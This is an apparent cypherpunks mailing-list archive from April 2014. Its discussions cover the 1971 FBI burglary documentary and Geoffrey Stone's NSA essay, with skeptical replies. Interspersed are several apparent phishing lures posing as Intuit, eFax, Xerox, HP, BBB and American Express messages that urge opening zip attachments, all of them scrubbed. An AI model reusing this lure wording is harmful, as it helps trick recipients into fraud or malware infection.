From payroll at intuit.com Tue Apr 1 01:23:35 2014 From: payroll at intuit.com (Payroll Invoice) Date: 1 Apr 2014 08:23:35 GMT Subject: Payment Overdue - Please respond Message-ID: Please find attached payroll reports for the past months. Remit the new payment by 04/08/2014 as outlines under our payment agreement. Sincerely, Lon Tate This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you. -------------- next part -------------- A non-text attachment was scrubbed... Name: Payroll.zip Type: application/zip Size: 8950 bytes Desc: not available URL: From message at inbound.efax.com Tue Apr 1 08:06:12 2014 From: message at inbound.efax.com (eFax Corporate) Date: Tue, 1 Apr 2014 10:06:12 -0500 Subject: Corporate eFax message from "374-795-8364" - 5 pages Message-ID: <_001_latf1_did11-1663375535-3362337038-21123206627717297media3la_@media1.latf1.colo.j2noc.com> Fax Message [Caller-ID: 374-795-8364] You have received a 5 pages fax at 2014-01-04 05:55:55 CST.* The reference number for this fax is latf1_did11-1663375535-3362337038-21.View this fax using your PDF reader.Please visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service.Thank you for using the eFax service!Home | Contact | Login | 2013 j2 Global Communications, Inc. All rights reserved.eFax is a registered trademark of j2 Global Communications, Inc.This account is subject to the terms listed in the eFax Customer Agreement. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: multipart/related Size: 3 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1862 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: FAX_6291741_7941724.zip Type: application/zip Size: 8541 bytes Desc: not available URL: From scan.475 at jfet.org Tue Apr 1 07:29:37 2014 From: scan.475 at jfet.org (Local Scan) Date: 1 Apr 2014 14:29:37 GMT Subject: Scanned Image from a Xerox WorkCentre Message-ID: <53FIU8Y4U77HG798JWYBSEGVZFJLDHL4L4EVRX@jfet.org> Please open the attached document. Sent by: jfet.org Number of Images: 6 Attachment File Type: ZIP [PDF] WorkCentre Pro Location: Machine location not set Device Name: jfet.org Attached file is scanned image in PDF format. Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: Scan_Local_0401GMT.zip Type: application/zip Size: 8962 bytes Desc: not available URL: From message at inbound.j2.com Tue Apr 1 08:16:17 2014 From: message at inbound.j2.com (jConnect) Date: Tue, 1 Apr 2014 15:16:17 +0000 Subject: Corporate eFax message from "434-487-3633" - 5 pages Message-ID: <_002_latf1_did11-1114045711-5646235876-15485081891672901media1la_@media4.lax3.colo.j2noc.com> Fax Message [Caller-ID: 434-487-3633] You have received a 5 pages fax at 2014-01-04 05:55:55 CST.* The reference number for this fax is latf1_did11-1114045711-5646235876-15.Download attachment with the fax using your PDF reader.Please visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service.Thank you for using the eFax service!Home | Contact | Login | 2014 j2 Global Communications, Inc. All rights reserved.eFax is a registered trademark of j2 Global Communications, Inc.This account is subject to the terms listed in the eFax Customer Agreement. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: multipart/related Size: 3 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1881 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: FAX_6291741_7941724.zip Type: application/zip Size: 8541 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Tue Apr 1 20:02:09 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 1 Apr 2014 20:02:09 -0700 (PDT) Subject: Investigating the Investigators Message-ID: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> Group of people who burgled the FBI in 1971 https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1 On March 8, 1971, a group of anti-war activists broke into an FBI office in Media, Pennsylvania, and changed the course of history. The burglars wound up blowing the whistle on illegal surveillance and bullying tactics employed by J. Edgar Hoover and his government agency — and despite one of the biggest FBI dragnets ever, the perpetrators were never caught and their identities remained secret… until now. The new documentary "1971" reveals these former political radicals as they tell their story on film for the first time. At the time of the break-in, anti-war activists believed they were being watched by the FBI. Bonnie and John Raines, a married couple with three children, had participated in rallies and were photographed by suspected govenment agents. That prompted them to join the group, which eventually swiped more than 1,000 documents. Billing themselves as 'The Citizens Commission to Investigate the FBI,' the members took serious risks to deliver the stolen FBI documents to the press. "We knew that if we got caught, we were going to face very serious prison time," says John Raines in the film (as seen in the trailer)."If the FBI was suppressing dissent, it was as important to expose that as it was to end the war," says journalist Betty Medsger, who is responsible for exposing the burglars's identities. She wrote the new book "The Burglary" and worked closely with "1971" filmmakers. "Break into an FBI office, remove files, and mail them to newspapers," says Bonnie Raines of the plan. It was not haphazard. They cased the FBI building in Media for weeks, tracking comings and goings and drawing up detailed maps and a plan. Multiple setbacks nearly halted the operation. "A couple of weeks before the break-in date, one person in the group dropped out — simply walked away. This person knew every detail of their plans. The risk that he would expose them was huge. They went ahead anyway," says "1971" director and producer Johanna Hamilton. "The break-in itself almost didn't happen. When the chief lock-picker arrived, he found the lock on the FBI's door was different than the one he had been practicing for. So the whole process was much more complicated and tenuous than they originally thought," she tells Yahoo Movies. Once the documents were taken, the group spent days scanning them to find evidence of FBI wrongdoing, according to a recent New York Times report. They sent copies of the most revealing documents to journalists, one of whom was Medsger of the Washington Post. She was one of few journalists who acted on the information. The biggest discovery was finding that Hoover ran a covert operation with the code name COINTELPRO, under which the FBI would survey, infiltrate, discredit, and disrupt political groups and U.S. citizens deemed "subversive." Much of the activity was illegal. The burglary which exposed COINTELPRO led to the first-ever congressional investigation of U.S. intelligence agencies, and as a result the operation was terminated.The documents revealed that a wide array of postal workers, police, and even switchboard operators were used as FBI informants. Martin Luther King Jr. was a major target of COINTELPRO, with agents having him under surveillance and repeatedly bugging his home and hotel rooms. "What is consistently amazing to me is the fact that only one of the documents they stole contained the caption COINTELPRO. It was that one document that would lead to the full revelation of FBI dirty tricks," says Hamilton. Another stunning revelation: Hoover's program had been running since 1956. "By 1971 so many people and groups had been put under surveillance," says Hamilton. "Basically there was blanket surveillance of African Americans — both well known, like the Black Panthers, and less known, everyday people, students, people who were active in communal African-American life." "1971" debuts at the Tribeca Film Festival in New York on April 18. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7292 bytes Desc: not available URL: From shelley at misanthropia.info Tue Apr 1 21:39:00 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Tue, 01 Apr 2014 21:39:00 -0700 Subject: Investigating the Investigators Message-ID: <1396413540.19427.101719853.680E5575@webmail.messagingengine.com> On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > Group of people who burgled the FBI in 1971 > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1 Thanks for posting this. It's so timely and historically important. Can't wait to see it. Hey Jim, what happened with the Yahoo account you were locked out of? Did you ever get the lost emails and contacts restored? -Shelley > On March 8, 1971, a group of anti-war activists broke into an FBI office > in Media, Pennsylvania, and changed the course of history. > The burglars wound up blowing the whistle on illegal surveillance and > bullying tactics employed by J. Edgar Hoover and his government agency — > and despite one of the biggest FBI dragnets ever, the perpetrators were > never caught and their identities remained secret… until now. > The new documentary "1971" reveals these former political radicals as > they tell their story on film for the first time. At the time of the > break-in, anti-war activists believed they were being watched by the FBI. > Bonnie and John Raines, a married couple with three children, had > participated in rallies and were photographed by suspected govenment > agents. That prompted them to join the group, which eventually swiped > more than 1,000 documents. > Billing themselves as 'The Citizens Commission to Investigate the FBI,' > the members took serious risks to deliver the stolen FBI documents to the > press. "We knew that if we got caught, we were going to face very serious > prison time," says John Raines in the film (as seen in the trailer)."If > the FBI was suppressing dissent, it was as important to expose that as it > was to end the war," says journalist Betty Medsger, who is responsible > for exposing the burglars's identities. She wrote the new book "The > Burglary" and worked closely with "1971" filmmakers. > "Break into an FBI office, remove files, and mail them to newspapers," > says Bonnie Raines of the plan. It was not haphazard. They cased the FBI > building in Media for weeks, tracking comings and goings and drawing up > detailed maps and a plan. > Multiple setbacks nearly halted the operation. "A couple of weeks before > the break-in date, one person in the group dropped out — simply walked > away. This person knew every detail of their plans. The risk that he > would expose them was huge. They went ahead anyway," says "1971" director > and producer Johanna Hamilton. "The break-in itself almost didn't happen. > When the chief lock-picker arrived, he found the lock on the FBI's door > was different than the one he had been practicing for. So the whole > process was much more complicated and tenuous than they originally > thought," she tells Yahoo Movies. > Once the documents were taken, the group spent days scanning them to find > evidence of FBI wrongdoing, according to a recent New York Times report. > They sent copies of the most revealing documents to journalists, one of > whom was Medsger of the Washington Post. She was one of few journalists > who acted on the information. > The biggest discovery was finding that Hoover ran a covert operation with > the code name COINTELPRO, under which the FBI would survey, infiltrate, > discredit, and disrupt political groups and U.S. citizens deemed > "subversive." Much of the activity was illegal. > > The burglary which exposed COINTELPRO led to the first-ever congressional > investigation of U.S. intelligence agencies, and as a result the > operation was terminated.The documents revealed that a wide array of > postal workers, police, and even switchboard operators were used as FBI > informants. Martin Luther King Jr. was a major target of COINTELPRO, with > agents having him under surveillance and repeatedly bugging his home and > hotel rooms. > "What is consistently amazing to me is the fact that only one of the > documents they stole contained the caption COINTELPRO. It was that one > document that would lead to the full revelation of FBI dirty tricks," > says Hamilton. > Another stunning revelation: Hoover's program had been running since > 1956. "By 1971 so many people and groups had been put under > surveillance," says Hamilton. "Basically there was blanket surveillance > of African Americans — both well known, like the Black Panthers, and less > known, everyday people, students, people who were active in communal > African-American life." > "1971" debuts at the Tribeca Film Festival in New York on April 18. From jamesdbell9 at yahoo.com Tue Apr 1 22:16:38 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 1 Apr 2014 22:16:38 -0700 (PDT) Subject: Investigating the Investigators In-Reply-To: <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> Message-ID: <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > Group of people who burgled the FBI in 1971 > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reveal-themselves-in--1971-205728154.html?vp=1 >Thanks for posting this.  It's so timely and historically important. >Can't wait to see it. >Hey Jim, what happened with the Yahoo account you were locked out of? >Did you ever get the lost emails and contacts restored? >-Shelley Haven't got back on jamesdbell8 at yahoo.com.   I'm convinced that Yahoo is a bunch of crooks.  Bleeding-heart, do-gooder liberal crooks.  Anybody who looks at Yahoo's news sees this.            Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1652 bytes Desc: not available URL: From Brian.Winn at newyork.bbb.org Tue Apr 1 20:24:31 2014 From: Brian.Winn at newyork.bbb.org (Better Business Bureau) Date: 2 Apr 2014 03:24:31 GMT Subject: FW: Case X4710H1S947MFC5 Message-ID: <24240.4030506@newyork.bbb.org> The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer's concern are included on the reverse. Please review this matter and advise us of your position. As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct. In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by September 13, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter. The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company. We encourage you to print this complaint (attached file - Case_X4710H1S947MFC5), answer the questions and respond to us. We look forward to your prompt attention to this matter. Sincerely, Brian.Winn Council of Better Business Bureaus 3033 Wilson Blvd, Suite 600 Arlington, VA 22201 -------------- next part -------------- A non-text attachment was scrubbed... Name: Case_X4710H1S947MFC5.zip Type: application/zip Size: 7962 bytes Desc: not available URL: From HP_Printer at jfet.org Wed Apr 2 07:27:33 2014 From: HP_Printer at jfet.org (HP Digital Device) Date: 2 Apr 2014 14:27:33 GMT Subject: Scanned Image from a HP Digital Device Message-ID: <799945845880.s2Q2RM2o026120@ga.adp.com> Please open the attached document. This document was digitally sent to you using an HP Digital Sending device. ------------------------------------------------------------------------------- This email has been scanned for viruses and spam. ------------------------------------------------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: Image_001_040214.zip Type: application/zip Size: 8099 bytes Desc: not available URL: From beam at rayservers.net Wed Apr 2 09:42:17 2014 From: beam at rayservers.net (beam) Date: Wed, 02 Apr 2014 18:42:17 +0200 Subject: Google can grow up to not be evil Message-ID: <533C3DE9.5090308@rayservers.net> "By working together with those that harvest value from nature, Google can quickly create a truly non-evil system for all. We suggest that the “there is one way and that way is secure, economically-viable-and-self-extending, anonymous and untraceable” is the policy to adopt, in that order. We are happy to amplify this." Source: http://courtofrecord.co.uk/US/US-Google-cover/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 261 bytes Desc: OpenPGP digital signature URL: From adam at cypherspace.org Wed Apr 2 20:29:47 2014 From: adam at cypherspace.org (Adam Back) Date: Wed, 2 Apr 2014 20:29:47 -0700 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: That review does not really jive with the complaints from the people on the intelligence oversight committee, the NSA leaders who explicitly lied to congress, the complaint from the author of the patriot act that he thought the NSA was breaking the law, and the subsequently released complaints from the FISA court about illegal and non-credible abusive interpretations of the law and the FISA courts instructions. Also there were several reports saying nothing of consequence was prevented by the entire program. If you know him, maybe you want to ask him how he reconciles all these now matter of public record conflicts with what he just said. Of course he did leave wiggle room in the form of "[not] so clearly unlawful that it would have been appropriate for the NSA to refuse to fulfill its responsibilities." ie it was only somewhat illegal so hey thats ok then? Have to say it seems more plausible to me that they did a faux-forthright job of answering questions from this new review process. I mean what else could they do? Stonewall? Adam On 2 April 2014 19:56, wrote: > > [ disclaimer, Geoff Stone is a friend of mine ] > > > > www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > > What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2339 bytes Desc: not available URL: From shelley at misanthropia.info Wed Apr 2 21:36:41 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Wed, 02 Apr 2014 21:36:41 -0700 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com> References: <20140403025616.D514A2280D8@palinka.tinho.net> <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com> Message-ID: <1396499801.8276.102171125.334FBBF4@webmail.messagingengine.com> On Wed, Apr 2, 2014, at 08:39 PM, Alfie John wrote: > You can probably stop with the NSA appologists propaganda, April Fools > was yesterday. Ha! That was my first thought, too. My second thought was, "I wonder what the spooks have on this guy?" It sounds like it was written under duress, like the fake "confessions" they make POWs give. From tpb-crypto at laposte.net Wed Apr 2 12:59:01 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 02 Apr 2014 21:59:01 +0200 Subject: Google can grow up to not be evil In-Reply-To: <533C3DE9.5090308@rayservers.net> References: <533C3DE9.5090308@rayservers.net> Message-ID: <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> > Message du 02/04/14 19:13 > De : "beam" > A : cypherpunks at al-qaeda.net, cypherpunks at cpunks.org, "cryptopolitics" > Copie à : > Objet : Google can grow up to not be evil > > "By working together with those that harvest value from nature, Google > can quickly create a truly non-evil system for all. > > We suggest that the “there is one way and that way is secure, > economically-viable-and-self-extending, anonymous and untraceable” is > the policy to adopt, in that order. > > We are happy to amplify this." > > Source: http://courtofrecord.co.uk/US/US-Google-cover/ > > > > > [ signature.asc (0.3 Ko) ] "We suggest that Google engineers embrace and adopt the lisp programming language to create a brand new open source operating system with a lisp kernel." I lost. From dan at geer.org Wed Apr 2 19:56:16 2014 From: dan at geer.org (dan at geer.org) Date: Wed, 02 Apr 2014 22:56:16 -0400 Subject: Geoff Stone, Obama's Review Group Message-ID: <20140403025616.D514A2280D8@palinka.tinho.net> [ disclaimer, Geoff Stone is a friend of mine ] www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology What I Told the NSA Because of my service on the President's Review Group last fall, which made recommendations to the president about NSA surveillance and related issues, the NSA invited me to speak today to the NSA staff at the NSA headquarters in Fort Meade, Maryland, about my work on the Review Group and my perceptions of the NSA. Here, in brief, is what I told them: From the outset, I approached my responsibilities as a member of the Review Group with great skepticism about the NSA. I am a long-time civil libertarian, a member of the National Advisory Council of the ACLU, and a former Chair of the Board of the American Constitution Society. To say I was skeptical about the NSA is, in truth, an understatement. I came away from my work on the Review Group with a view of the NSA that I found quite surprising. Not only did I find that the NSA had helped to thwart numerous terrorist plots against the United States and its allies in the years since 9/11, but I also found that it is an organization that operates with a high degree of integrity and a deep commitment to the rule of law. Like any organization dealing with extremely complex issues, the NSA on occasion made mistakes in the implementation of its authorities, but it invariably reported those mistakes upon discovering them and worked conscientiously to correct its errors. The Review Group found no evidence that the NSA had knowingly or intentionally engaged in unlawful or unauthorized activity. To the contrary, it has put in place carefully-crafted internal proceduresto ensure that it operates within the bounds of its lawful authority. This is not to say that the NSA should have had all of the authorities it was given. The Review Group found that many of the programs undertaken by the NSA were highly problematic and much in need of reform. But the responsibility for directing the NSA to carry out those programs rests not with the NSA, but with the Executive Branch, the Congress, and the Foreign Intelligence Surveillance Court, which authorized those programs -- sometimes without sufficient attention to the dangers they posed to privacy and civil liberties. The NSA did its job -- it implemented the authorities it was given. It gradually became apparent to me that in the months after Edward Snowden began releasing information about the government's foreign intelligence surveillance activities, the NSA was being severely -- and unfairly -- demonized by its critics. Rather than being a rogue agency that was running amok in disregard of the Constitution and laws of the United States, the NSA was doing its job. It pained me to realize that the hard-working, dedicated, patriotic employees of the NSA, who were often working for far less pay than they could have earned in the private sector because they were determined to help protect their nation from attack, were being castigated in the press for the serious mistakes made, not by them, but by Presidents, the Congress, and the courts. Of course, "I was only following orders" is not always an excuse. But in no instance was the NSA implementing a program that was so clearly illegal or unconstitutional that it would have been justified in refusing to perform the functions assigned to it by Congress, the President, and the Judiciary. Although the Review Group found that many of those programs need serious re-examination and reform, none of them was so clearly unlawful that it would have been appropriate for the NSA to refuse to fulfill its responsibilities. Moreover, to the NSA's credit, it was always willing to engage the Review Group in serious and candid discussions about the merits of its programs, their deficiencies, and the ways in which those programs could be improved. Unlike some other entities in the intelligence community and in Congress, the leaders of the NSA were not reflexively defensive, but were forthright, engaged, and open to often sharp questions about the nature and implementation of its programs. To be clear, I am not saying that citizens should trust the NSA. They should not. Distrust is essential to effective democratic governance. The NSA should be subject to constant and rigorous review, oversight, scrutiny, and checks and balances. The work it does, however important to the safety of the nation, necessarily poses grave dangers to fundamental American values, particularly if its work is abused by persons in positions of authority. If anything, oversight of the NSA -- especially by Congress -- should be strengthened. The future of our nation depends not only on the NSA doing its job, but also on the existence of clear, definitive, and carefully enforced rules and restrictions governing its activities. In short, I found, to my surprise, that the NSA deserves the respect and appreciation of the American people. But it should never, ever, be trusted. From dal at riseup.net Wed Apr 2 21:56:50 2014 From: dal at riseup.net (Douglas Lucas) Date: Wed, 02 Apr 2014 23:56:50 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <533CEA12.4020904@riseup.net> >From the looks of this speech, the NSA must have blackmailed him. On 04/02/2014 09:56 PM, dan at geer.org wrote: > [ disclaimer, Geoff Stone is a friend of mine ] > > > www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > > What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal proceduresto ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given. The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. > > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job. It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. > > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. > > From cypher at cpunk.us Thu Apr 3 00:27:59 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 3 Apr 2014 02:27:59 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <9198C9B9-12CB-4CE7-9A28-4BA24DFE91C6@cpunk.us> On Apr 2, 2014, at 21:56, dan at geer.org wrote: > > [ disclaimer, Geoff Stone is a friend of mine ] > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. This just smacks of an apologetics piece; maybe even something the NSA themselves might write. Nobody but the most willfully delusional apologist could possibly look at the history of this agency, especially but not limited to the last year, and believe that the NSA is an agency with "good intentions". Self-serving, corporate and political protectionists, yes. Good intentions, nobody really believes that. Lastly, isn't it a little (or a lot) arrogant to believe that an agency that's fooled Congress and the President, lied to the American people, and undermined the security of worldwide communications, couldn't fool you too? What did he think? That they would simply open up and fess ip to their abuse because they respect who he is? Thank you, Ft. Meade for the latest comedy show. Cypher From jya at pipeline.com Thu Apr 3 03:42:29 2014 From: jya at pipeline.com (John Young) Date: Thu, 03 Apr 2014 06:42:29 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: Stone's is a good statement which correctly places responsibility on three-branch policy and oversight of NSA, a military unit obliged to obey command of civilians however bizarre and politically self-serving. ODNI and NSA have been inviting a series of critics and journalists to discussions. Most have resulted in statements similar to Stone's. No such discussions were held after 9/11. Incorrect to compare NSA to rogue, dirty work, civilian-led CIA which will attack the three branches if riled. That is the blackmail looming since 1947. Greater public oversight of the three-branches is needed, for they are the rogue, dirty work, civilian-led three LS, protecty by highest secrecy. If this can be helped by these invited discussions and statements, that would be a true advance beyond mere futile debate so far generated by shallow journalisitic reporting and polemics. Release of far more of Snowden's documents will be needed for this to happen, hopefully the whole wad by a means that will put the technology in the hands of those who can understand it. So far, the journalists have released only the most useful to arouse indignation and refuse to release what could make a lasting difference. Not that journalists should be expected to make a lasting difference. At 10:56 PM 4/2/2014, you wrote: >[ disclaimer, Geoff Stone is a friend of mine ] > > >www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > >What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal proceduresto ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given. The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. > > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job. It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. > > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. From AmericanExpress at welcome.aexp.com Thu Apr 3 00:26:34 2014 From: AmericanExpress at welcome.aexp.com (American Express Customer Service) Date: 3 Apr 2014 07:26:34 GMT Subject: American Express - Safe Key Message-ID: A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7446 bytes Desc: not available URL: From jya at pipeline.com Thu Apr 3 05:09:50 2014 From: jya at pipeline.com (John Young) Date: Thu, 03 Apr 2014 08:09:50 -0400 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: 